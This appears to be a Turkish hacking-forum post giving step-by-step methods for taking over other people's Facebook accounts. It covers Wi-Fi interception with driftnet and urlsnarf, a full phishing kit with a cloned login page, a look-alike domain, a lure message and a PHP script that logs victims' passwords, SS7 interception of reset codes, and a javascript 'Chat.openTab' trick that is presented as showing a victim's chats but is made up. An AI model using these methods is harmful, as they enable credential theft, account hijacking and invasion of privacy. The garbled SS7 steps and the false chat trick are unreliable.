- Driftnet’i kullanarak kurban navigasyonundan görüntüleri koklayın: Bu, saldırının üçüncü aşamasıdır. Driftnet, ağ trafiğini dinlemek ve TCP akışlarından görüntü almak için kullanılan bir programdır. TCP akışları, ağdaki cihazların veri alışverişi yapmak için kullandığı bir protokoldür. Driftnet, hedef cihazın Facebook'ta gördüğü veya paylaştığı görüntüleri yakalamanızı sağlar. Bu işlemi yapmak için, Terminal uygulamasında driftnet -i [Ağ Arayüzü Adı] komutunu çalıştırabilirsiniz. Bu komut, ağ arayüzü adı parametresini alır. Bu parametreyi, daha önce kaydettiğiniz değerle değiştirmeniz gerekir. Örneğin, driftnet -i wlan0 komutu, wlan0 adlı ağ arayüzü ile ağ trafiğinden görüntü alır. Bu komutu çalıştırdıktan sonra, komutun çalışmasına izin verin ve durdurmayın. Bu komut, bir pencere açarak, yakaladığınız görüntüleri gösterir.
- urlsnarf kullanarak kurban navigasyonundan URL bilgilerini koklayın: Bu, saldırının dördüncü aşamasıdır. urlsnarf, bir Ortak Günlük biçimini izleyerek tüm HTTP isteklerini koklamanızı sağlar. HTTP istekleri, ağdaki cihazların web sayfalarına erişmek için kullandığı bir protokoldür. urlsnarf, hedef cihazın Facebook'ta ziyaret ettiği veya aradığı web sayfalarının URL'lerini yakalamanızı sağlar. Bu işlemi yapmak için, Terminal uygulamasında urlsnarf -i [Ağ arabirimi adı] komutunu çalıştırabilirsiniz. Bu komut, ağ arabirimi adı parametresini alır. Bu parametreyi, daha önce kaydettiğiniz değerle değiştirmeniz gerekir. Örneğin, urlsnarf -i wlan0 komutu, wlan0 adlı ağ arabirimi ile tüm HTTP isteklerini koklar. Bu komutu çalıştırdıktan sonra, komutun çalışmasına izin verin ve durdurmayın. Bu komut, Terminal uygulamasında, yakaladığınız URL'leri gösterir.
Bu iki komutu çalıştırdığınızda, saldırgan hedef cihazın Facebook hesabına ilişkin görüntü ve URL bilgilerini elde eder. Bu bilgiler, saldırganın hedef cihazın Facebook şifresini, mesajlarını, arkadaşlarını, beğenilerini ve diğer bilgilerini öğrenmesine yardımcı olabilir. Bu bilgileri kullanarak, saldırgan hedef cihazın Facebook hesabını ele geçirebilir veya kötüye kullanabilir.
Saldırıyı tamamladığınızda, aşağıdaki komutu yürüterek paket iletmeyi devre dışı bırakın: sysctl -w net.ipv4.ip_forward=0. Bu komut, IPv4 paket iletmeyi 1'den 0'a değiştirir. Bu, paket iletmeyi etkinleştirmekten devre dışı bırakmaya geçtiğiniz anlamına gelir. Bu, ağdaki veri paketlerinin bir ağ arabiriminden diğerine geçmesini engeller. Bu, saldırının sonlandırılması için gereklidir.
Bu yöntem, bir Wi-Fi ağına bağlı olan bir cihazın Facebook hesabını ele geçirmek için kullanılan bir saldırı türüdür. Bu saldırıda, saldırgan Wi-Fi ağındaki veri paketlerini yakalar, değiştirir ve yeniden yönlendirir. Böylece, saldırgan hedef cihazın Facebook şifresini ve diğer bilgilerini görebilir. Bu saldırıyı yapmak için, yukarıda anlattığım adımları takip etmeniz gerekir.
Bu saldırıyı önlemek için, Wi-Fi ağınızın güvenliğini artırmalısınız. Wi-Fi ağınızın şifresini güçlü ve karmaşık bir şekilde belirlemeli, düzenli olarak değiştirmeli, WPA2 veya WPA3 gibi güvenli bir şifreleme protokolü kullanmalı, ağınıza bağlanan cihazları kontrol etmeli ve şüpheli aktiviteleri rapor etmelisiniz. Ayrıca, Facebook hesabınızın güvenliğini de artırmalısınız. Facebook hesabınızın şifresini güçlü ve karmaşık bir şekilde belirlemeli, düzenli olarak değiştirmeli, iki faktörlü kimlik doğrulama gibi ek güvenlik önlemleri kullanmalı, hesabınıza giriş yapan cihazları kontrol etmeli ve şüpheli aktiviteleri rapor etmelisiniz.
3) Phishing ile Facebook Hesabı Hacklemek:
Bu yöntem, bir kişiyi sahte bir Facebook giriş sayfasına yönlendirerek, onun e-posta ve şifresini ele geçirmeye çalışır. Bu yöntemde, saldırgan hedef kişiye bir bağlantı gönderir ve onu Facebook hesabına giriş yapması için ikna eder. Ancak bağlantı, gerçek Facebook sayfasına değil, saldırganın oluşturduğu sahte bir sayfaya götürür. Hedef kişi bilgilerini girer girmez, saldırgan bunları alır ve gerçek Facebook sayfasına yönlendirir. Bu yöntemi kullanmak için aşağıdaki adımları izleyebilirsiniz:
- İlk olarak, internet bağlantınız olduğundan emin olun. Bu yöntem için internet bağlantısı şarttır.
- Sonra, sahte bir kimlik avı sayfası oluşturmanız gerekir. Bu sayfa, gerçek Facebook giriş sayfasının birebir kopyası olmalıdır. Bunu yapmak için, Facebook.com'a gidin ve hesabınızdan çıkış yaptığınızdan emin olun. Ardından, klavyenizde Ctrl + U tuşlarına basarak sayfanın kaynak kodunu görüntüleyin. Bu kod, sayfanın nasıl göründüğünü ve nasıl çalıştığını belirleyen HTML kodudur. Kaynak kodunu gördüğünüzde, tümünü seçin, kopyalayın ve bir not defterine yapıştırın. Bunu Ctrl + A, Ctrl + C ve Ctrl + V tuşlarına basarak gerçekleştirebilirsiniz.
- Kaynak kodunu not defterine kopyaladıktan sonra, bir değişiklik yapmanız gerekir. Bu değişiklik, sayfadaki oturum açma formunun eylem özniteliğini değiştirmektir. Eylem özniteliği, formun verilerini nereye göndereceğini belirler. Şu anda, bu öznitelik gerçek Facebook sayfasına işaret ediyor. Bunu değiştirmek için, not defterinde eylem kelimesini arayın. Bunu Ctrl + F tuşlarına basarak gerçekleştirebilirsiniz. Eylem kelimesini bulduğunuzda, yanındaki değeri process.php ile değiştirin. Bu, formun verilerini process.php adlı bir dosyaya göndereceği anlamına gelir. Bu dosyayı daha sonra oluşturacağız. Değişikliği yaptıktan sonra, kaynak kodunu kaydedin. Bunu Ctrl + S tuşlarına basarak gerçekleştirebilirsiniz.
- Şimdi, sahte bir web sitesi oluşturmak için bir web barındırma hizmeti kullanmanız gerekir. Web barındırma hizmeti, web sitenizi internete yüklemenizi ve erişilebilir kılmanızı sağlar. Örneğin, 000webhost, Hostinger, Wix gibi hizmetlerden birini seçebilirsiniz. Bu hizmetlere ücretsiz olarak kaydolabilirsiniz. Web barındırma hizmetine kaydolduğunuzda, bir alan adı seçmeniz gerekir. Alan adı, web sitenizin internet adresidir. Örneğin, facebook-login.com gibi. Bu alan adının gerçek Facebook sayfasına benzediğinden emin olun. Böylece, hedef kişi fark etmez ve bağlantıya tıklar.
- Web barındırma hizmetinin kontrol paneline girdiğinizde, dosya yöneticisini açın. Buradan, kaynak kodunu kaydettiğiniz not defteri dosyasını yükleyin. Dosyanın adını index.html olarak değiştirin. Bu, web sitenizin ana sayfası olacaktır. Ayrıca, process.php adında başka bir dosya oluşturun ve aşağıdaki kodu içine yapıştırın:
PHP:
<?php
header ('Location: https://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
- Bu kod, hedef kişinin girdiği e-posta ve şifreyi log.txt adlı bir dosyaya kaydeder ve onu gerçek Facebook sayfasına yönlendirir. Böylece, hedef kişi hiçbir şeyden şüphelenmez. Bu iki dosyayı web barındırma hizmetine yükledikten sonra, sahte web sitenizin hazır olduğunu göreceksiniz.
- Son adım olarak, hedef kişiye sahte web sitenizin bağlantısını gönderin ve onu Facebook hesabına giriş yapması için ikna edin. Örneğin, ona bir mesaj gönderebilirsiniz: "Hey, bu yeni Facebook özelliğini gördün mü? Çok harika! Hemen denemelisin. İşte bağlantısı: https://facebook-login.com"
- Hedef kişi bağlantıya tıkladığında, sahte Facebook giriş sayfasına yönlendirilecek ve e-posta ve şifresini girmesi istenecektir. Hedef kişi bilgilerini girdiğinde, siz de web barındırma hizmetinin kontrol panelinden log.txt dosyasını açarak bunları alabileceksiniz.
Bu yöntem, sahte bir Facebook giriş sayfası oluşturarak, bir kişinin e-posta ve şifresini ele geçirmenizi sağlar.
4) SS-7 GÜVENLİK AÇIĞI KULLANARAK FACEBOOK HACKLEME
SS7 Güvenlik Açığı, GSM ağlarında kullanılan bir iletişim protokolü olan SS7'nin (Signaling System 7) zayıf noktalarını kullanan bir siber saldırı türüdür. SS7, cep telefonlarının kendi operatörleri dışındaki operatörler ile haberleşmesini sağlayan bir ağdır. Bu ağ üzerinden, saldırganlar hedef kişinin SMS trafiğini, konumunu, arama kayıtlarını ve diğer bilgilerini ele geçirebilirler.
SS7 Güvenlik Açığı kullanarak Facebook hesabına erişmek için, hedef kişinin cep telefonu numarasını bilmek ve SS7 ağına erişim sağlayabilecek bir Linux işletim sistemi ve SS7 SDK'sına sahip olmak gerekmektedir. Bu şartları sağladıktan sonra, aşağıdaki adımları takip edebilirsiniz:
- Hedefin cep telefonu numarasını sahte bir MSC (Mobile Switching Center) düğümüne kaydedin. Bu sayede, hedefin gerçek operatörü ile bağlantısı kesilecek ve sizin kontrolünüzdeki sahte operatöre yönlendirilecektir.
- Facebook'ta Parolanızı Unuttum seçeneğini açın ve kullanıcının cep telefonu numarasını girin. Facebook, hedefe iki faktörlü kimlik doğrulama için bir kurtarma kodu gönderecektir.
- Gerçek MSC, SMS'yi SMS-C (Short Message Service Center)'ye dönüştürecektir. SMS-C, HLR (Home Location Register) ile iletişime geçecek ve hedefin yerini soracaktır.
- Gerçek HLR, sahte olan bir MSC adresi sağlayarak yanıt verecektir. Böylece, iki faktörlü kimlik doğrulama kurtarma kodu ele geçirilecek ve cihazınıza yönlendirilecektir.
- Ardından şifreyi sıfırlayabilir ve kişinin Facebook hesabına erişebilirsiniz.
5) Hedefin Kimliğini Kullanarak Facebook Hackleme
Bu yöntem sadece Kanada ve ABD dışındaki ülkelerde çalışıyor. Aşağıdaki adımları takip ederek bunu deneyebilirsiniz:
- Öncelikle, sohbet geçmişini görmek istediğiniz kişinin Facebook profil sayfasını açın.
- Sayfada, "Poke" (Dürt) adlı bir seçenek arayın. Bu, genellikle profil fotoğrafının altında veya sağ üst köşede bulunur.
- Poke seçeneğinin üzerine sağ tıklayın ve açılan menüden "Bağlantıyı Kopyala" seçin. Bu, o kişinin Facebook kimliğini içeren bir bağlantı kopyalamanızı sağlar. Bağlantı şöyle görünmelidir: https://www.facebook.com/profile.php?id=10007370953577
- Sonra, tarayıcınızın adres çubuğuna gidin ve şu kodu yapıştırın: javascript: Chat.openTab (VICTIM’S ID). Burada, VICTIM'S ID yerine kopyaladığınız Facebook kimliğini yazın. Örneğin, javascript: Chat.openTab (1234567890).
- Ardından, Enter tuşuna basın. Eğer her şey doğruysa, o kişinin Facebook'ta yaptığı tüm sohbetleri gösteren bir pencere açılacaktır. Bu, onların arkadaşlarıyla veya gruplarla yaptığı metin mesajlarını, sesli aramalarını ve video görüşmelerini içerir.
Bu yöntem, Facebook'un sohbet verilerini nasıl sakladığına bağlı olarak değişebilir. Bu nedenle, her zaman çalışmayabilir veya beklediğiniz sonucu vermeyebilir.
LOJİSTİK TİM SUNDU.
Moderatör tarafında düzenlendi:


